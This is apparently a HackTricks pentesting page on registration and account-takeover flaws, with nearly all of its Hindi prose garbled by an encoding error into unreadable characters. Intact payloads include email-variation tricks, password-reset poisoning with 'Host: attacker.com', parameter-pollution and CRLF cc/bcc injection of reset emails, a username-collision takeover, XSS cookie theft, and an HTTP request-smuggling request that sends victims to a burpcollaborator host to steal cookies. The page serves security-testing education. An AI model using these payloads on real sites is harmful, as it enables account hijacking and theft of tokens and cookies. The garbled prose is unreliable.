Hindi - Ht

Registration & Takeover Vulnerabilities

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ

рдкрдВрдЬреАрдХрд░рдг рдЕрдзрд┐рдЧреНрд░рд╣рдг

рдбреБрдкреНрд▓рд┐рдХреЗрдЯ рдкрдВрдЬреАрдХрд░рдг

  • рдПрдХ рдореМрдЬреВрджрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЬрдирд░реЗрдЯ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ

  • рдИрдореЗрд▓ рдХреЛ рдмрджрд▓рдиреЗ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:

  • рдЕрдкрд░рдХреЗрд╕

  • +1@

  • рдИрдореЗрд▓ рдореЗрдВ рдХреБрдЫ рдбреЙрдЯ рдЬреЛрдбрд╝реЗрдВ

  • рдИрдореЗрд▓ рдирд╛рдо рдореЗрдВ рд╡рд┐рд╢реЗрд╖ рд╡рд░реНрдг (%00, %09, %20)

  • рдИрдореЗрд▓ рдХреЗ рдмрд╛рдж рдХрд╛рд▓реЗ рд╡рд░реНрдг рдбрд╛рд▓реЗрдВ: test@test.com a

  • victim@gmail.com@attacker.com

  • victim@attacker.com@gmail.com

рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдЧрдгрдирд╛

рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдкрддрд╛ рд▓рдЧрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдХрдм рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЗ рдЕрдВрджрд░ рдкрдВрдЬреАрдХреГрдд рд╣реИред

рдкрд╛рд╕рд╡рд░реНрдб рдиреАрддрд┐

рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдмрдирд╛рдиреЗ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рдиреАрддрд┐ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ (рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдХрдордЬреЛрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ)ред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ рдЖрдк рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

SQL рдЗрдВрдЬреЗрдХреНрд╢рди

рдЗрд╕ рдкреГрд╖реНрда рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ рдпрд╣ рд╕реАрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдХреИрд╕реЗ рдЦрд╛рддрд╛ рдЕрдзрд┐рдЧреНрд░рд╣рдг рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ рдпрд╛ рдкрдВрдЬреАрдХрд░рдг рдлреЙрд░реНрдо рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ SQL рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬрд╛рдирдХрд╛рд░реА рдирд┐рдХрд╛рд▓реЗрдВред

рдУрде рдЕрдзрд┐рдЧреНрд░рд╣рдг

OAuth to Account takeover

SAML рдХрдордЬреЛрд░рд┐рдпрд╛рдБ

SAML Attacks

рдИрдореЗрд▓ рдмрджрд▓реЗрдВ

рдЬрдм рдкрдВрдЬреАрдХреГрдд рд╣реЛрдВ рддреЛ рдИрдореЗрд▓ рдмрджрд▓рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ рдФрд░ рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдпрд╣ рдкрд░рд┐рд╡рд░реНрддрди рд╕рд╣реА рдврдВрдЧ рд╕реЗ рдорд╛рдиреНрдп рд╣реИ рдпрд╛ рдЗрд╕реЗ рдордирдорд╛рдиреЗ рдИрдореЗрд▓ рдореЗрдВ рдмрджрд▓ рд╕рдХрддреЗ рд╣реИрдВред

рдЕрдзрд┐рдХ рдЬрд╛рдВрдЪреЗрдВ

  • рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдк рдирд┐рд╖реНрдХреНрд░рд┐рдп рдИрдореЗрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ

  • рд▓рдВрдмрд╛ рдкрд╛рд╕рд╡рд░реНрдб (>200) DoS рдХреА рдУрд░ рд▓реЗ рдЬрд╛рддрд╛ рд╣реИ

  • рдЦрд╛рддрд╛ рдирд┐рд░реНрдорд╛рдг рдкрд░ рджрд░ рд╕реАрдорд╛рдУрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ

  • username@burp_collab.net рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдФрд░ рдХреЙрд▓рдмреИрдХ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВ

рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдЕрдзрд┐рдЧреНрд░рд╣рдг

рд░реЗрдлрд░рд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдЯреЛрдХрди рд▓реАрдХ

  1. рдЕрдкрдиреЗ рдИрдореЗрд▓ рдкрддреЗ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ

  2. рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рд▓рд┐рдВрдХ рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ

  3. рдкрд╛рд╕рд╡рд░реНрдб рди рдмрджрд▓реЗрдВ

  4. рдХрд┐рд╕реА 3rd рдкрд╛рд░реНрдЯреА рд╡реЗрдмрд╕рд╛рдЗрдЯреЛрдВ рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ (рдЬреИрд╕реЗ: рдлреЗрд╕рдмреБрдХ, рдЯреНрд╡рд┐рдЯрд░)

  5. Burp Suite рдкреНрд░реЙрдХреНрд╕реА рдореЗрдВ рдЕрдиреБрд░реЛрдз рдХреЛ рдЗрдВрдЯрд░рд╕реЗрдкреНрдЯ рдХрд░реЗрдВ

  6. рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рд░реЗрдлрд░рд░ рд╣реЗрдбрд░ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдЯреЛрдХрди рд▓реАрдХ рдХрд░ рд░рд╣рд╛ рд╣реИред

рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдкреЙрдЗрдЬрд╝рдирд┐рдВрдЧ

  1. Burp Suite рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдЕрдиреБрд░реЛрдз рдХреЛ рдЗрдВрдЯрд░рд╕реЗрдкреНрдЯ рдХрд░реЗрдВ

  2. Burp Suite рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╣реЗрдбрд░ рдЬреЛрдбрд╝реЗрдВ рдпрд╛ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ: Host: attacker.com, X-Forwarded-Host: attacker.com

  3. рд╕рдВрд╢реЛрдзрд┐рдд рд╣реЗрдбрд░ рдХреЗ рд╕рд╛рде рдЕрдиреБрд░реЛрдз рдХреЛ рдлреЙрд░рд╡рд░реНрдб рдХрд░реЗрдВ http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

  4. host header рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ URL рдХреА рддрд▓рд╛рд╢ рдХрд░реЗрдВ рдЬреИрд╕реЗ: https://attacker.com/reset-password.php?token=TOKEN

рдИрдореЗрд▓ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

  1. рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдЕрдкрдиреЗ рдЦрд╛рддреЗ рдореЗрдВ рд▓реЙрдЧрд┐рди рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓реЗрдВ рдлреАрдЪрд░ рдкрд░ рдЬрд╛рдирд╛ рд╣реЛрдЧрд╛ред

  2. Burp Suite рд╢реБрд░реВ рдХрд░реЗрдВ рдФрд░ рдЕрдиреБрд░реЛрдз рдХреЛ рдЗрдВрдЯрд░рд╕реЗрдкреНрдЯ рдХрд░реЗрдВред

  3. рдЗрд╕реЗ рд░рд┐рдкреАрдЯрд░ рдЯреИрдм рдореЗрдВ рднреЗрдЬреЗрдВ рдФрд░ рдкреИрд░рд╛рдореАрдЯрд░ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ: рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ ID/рдИрдореЗрд▓ powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдЯреЛрдХрди рдХреЛ рд╣рд░ рдмрд╛рд░ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рд░реВрдк рд╕реЗ рдЙрддреНрдкрдиреНрди рдФрд░ рдЕрджреНрд╡рд┐рддреАрдп рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЯреЛрдХрди рд╕рдорд╛рдкреНрдд рд╣реЛрддрд╛ рд╣реИ рдпрд╛ рдпрд╣ рд╣рдореЗрд╢рд╛ рд╕рдорд╛рди рд╣реЛрддрд╛ рд╣реИ, рдХреБрдЫ рдорд╛рдорд▓реЛрдВ рдореЗрдВ рдЙрддреНрдкрдиреНрди рдХрд░рдиреЗ рдХрд╛ рдПрд▓реНрдЧреЛрд░рд┐рджрдо рдХрдордЬреЛрд░ рд╣реЛрддрд╛ рд╣реИ рдФрд░ рдЗрд╕реЗ рдЕрдиреБрдорд╛рдирд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЪрд░ рдПрд▓реНрдЧреЛрд░рд┐рджрдо рджреНрд╡рд╛рд░рд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВред

  • рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк

  • рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ ID

  • рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ рдИрдореЗрд▓

  • рдкрд╣рд▓рд╛ рдирд╛рдо рдФрд░ рдЕрдВрддрд┐рдо рдирд╛рдо

  • рдЬрдиреНрдо рддрд┐рдерд┐

  • рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлреА

  • рдХреЗрд╡рд▓ рд╕рдВрдЦреНрдпрд╛

  • рдЫреЛрдЯрд╛ рдЯреЛрдХрди рдЕрдиреБрдХреНрд░рдо (рдЕрдХреНрд╖рд░ [A-Z,a-z,0-9] рдХреЗ рдмреАрдЪ)

  • рдЯреЛрдХрди рдкреБрди: рдЙрдкрдпреЛрдЧ

  • рдЯреЛрдХрди рд╕рдорд╛рдкреНрддрд┐ рддрд┐рдерд┐

Leaking Password Reset Token

  1. рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдИрдореЗрд▓ рдХреЗ рд▓рд┐рдП API/UI рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдЕрдиреБрд░реЛрдз рдЯреНрд░рд┐рдЧрд░ рдХрд░реЗрдВ, рдЬреИрд╕реЗ: test@mail.com

  2. рд╕рд░реНрд╡рд░ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдХрд░реЗрдВ рдФрд░ resetToken рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред

  3. рдлрд┐рд░ рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдПрдХ URL рдореЗрдВ рдХрд░реЗрдВ рдЬреИрд╕реЗ https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

  1. рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХреЗ рд╕рд╛рде рдкрдВрдЬреАрдХрд░рдг рдХрд░реЗрдВ рдЬреЛ рдкреАрдбрд╝рд┐рдд рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХреЗ рд╕рдорд╛рди рд╣реЛ, рд▓реЗрдХрд┐рди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХреЗ рдкрд╣рд▓реЗ рдФрд░/рдпрд╛ рдмрд╛рдж рдореЗрдВ рдЦрд╛рд▓реА рд╕реНрдерд╛рди рдбрд╛рд▓реЗрдВред рдЬреИрд╕реЗ: "admin "

  2. рдЕрдкрдиреЗ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХреЗ рд╕рд╛рде рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВред

  3. рдЕрдкрдиреЗ рдИрдореЗрд▓ рдкрд░ рднреЗрдЬреЗ рдЧрдП рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдФрд░ рдкреАрдбрд╝рд┐рдд рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдХрд░реЗрдВред

  4. рдирдП рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд╕рд╛рде рдкреАрдбрд╝рд┐рдд рдЦрд╛рддреЗ рдореЗрдВ рд▓реЙрдЧрд┐рди рдХрд░реЗрдВред

рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо CTFd рдЗрд╕ рд╣рдорд▓реЗ рдХреЗ рдкреНрд░рддрд┐ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдерд╛ред рджреЗрдЦреЗрдВ: CVE-2020-7245

Account Takeover Via Cross Site Scripting

  1. рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЗ рдЕрдВрджрд░ рдпрд╛ рдЙрдкрдбреЛрдореЗрди рдореЗрдВ XSS рдЦреЛрдЬреЗрдВ рдпрджрд┐ рдХреБрдХреАрдЬрд╝ рдХреЛ рдкреИрд░реЗрдВрдЯ рдбреЛрдореЗрди рдкрд░ рд╕реНрдХреЛрдк рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ: *.domain.com

  2. рд╡рд░реНрддрдорд╛рди рд╕рддреНрд░ рдХреБрдХреА рд▓реАрдХ рдХрд░реЗрдВред

  3. рдХреБрдХреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХрд░реЗрдВред

Account Takeover Via HTTP Request Smuggling

1. smuggler рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рддрд╛рдХрд┐ HTTP рдЕрдиреБрд░реЛрдз рд╕реНрдордЧрд▓рд┐рдВрдЧ (CL, TE, CL.TE) рдХреЗ рдкреНрд░рдХрд╛рд░ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдпрд╛ рдЬрд╛ рд╕рдХреЗред powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h 2. рдПрдХ рдЕрдиреБрд░реЛрдз рддреИрдпрд╛рд░ рдХрд░реЗрдВ рдЬреЛ POST / HTTP/1.1 рдХреЛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдбреЗрдЯрд╛ рдХреЗ рд╕рд╛рде рдУрд╡рд░рд░рд╛рдЗрдЯ рдХрд░реЗрдЧрд╛: GET http://something.burpcollaborator.net HTTP/1.1 X: рдЬрд┐рд╕рдХрд╛ рд▓рдХреНрд╖реНрдп рдкреАрдбрд╝рд┐рддреЛрдВ рдХреЛ burpcollab рдкрд░ рдУрдкрди рд░реАрдбрд╛рдпрд░реЗрдХреНрдЯ рдХрд░рдирд╛ рдФрд░ рдЙрдирдХреА рдХреБрдХреАрдЬрд╝ рдЪреБрд░рд╛рдирд╛ рд╣реИред 3. рдЕрдВрддрд┐рдо рдЕрдиреБрд░реЛрдз рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреЗ рд╕рдорд╛рди рд╣реЛ рд╕рдХрддрд╛ рд╣реИ

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone рд░рд┐рдкреЛрд░реНрдЯ рдЗрд╕ рдмрдЧ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рддреЗ рд╣реБрдП * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666

CSRF рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЦрд╛рддрд╛ рдЕрдзрд┐рдЧреНрд░рд╣рдг

  1. CSRF рдХреЗ рд▓рд┐рдП рдПрдХ рдкреЗрд▓реЛрдб рдмрдирд╛рдПрдВ, рдЬреИрд╕реЗ: тАЬрдкрд╛рд╕рд╡рд░реНрдб рдкрд░рд┐рд╡рд░реНрддрди рдХреЗ рд▓рд┐рдП рдСрдЯреЛ рд╕рдмрдорд┐рдЯ рд╡рд╛рд▓рд╛ HTML рдлреЙрд░реНрдотАЭ

  2. рдкреЗрд▓реЛрдб рднреЗрдЬреЗрдВ

JWT рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЦрд╛рддрд╛ рдЕрдзрд┐рдЧреНрд░рд╣рдг

JSON рд╡реЗрдм рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

  • рджреВрд╕рд░реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЖрдИрдбреА / рдИрдореЗрд▓ рдХреЗ рд╕рд╛рде JWT рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ

  • рдХрдордЬреЛрд░ JWT рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ

JWT Vulnerabilities (Json Web Tokens)

рд╕рдВрджрд░реНрдн

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
PreviousRate Limit BypassNextRegular expression Denial of Service - ReDoS

Last updated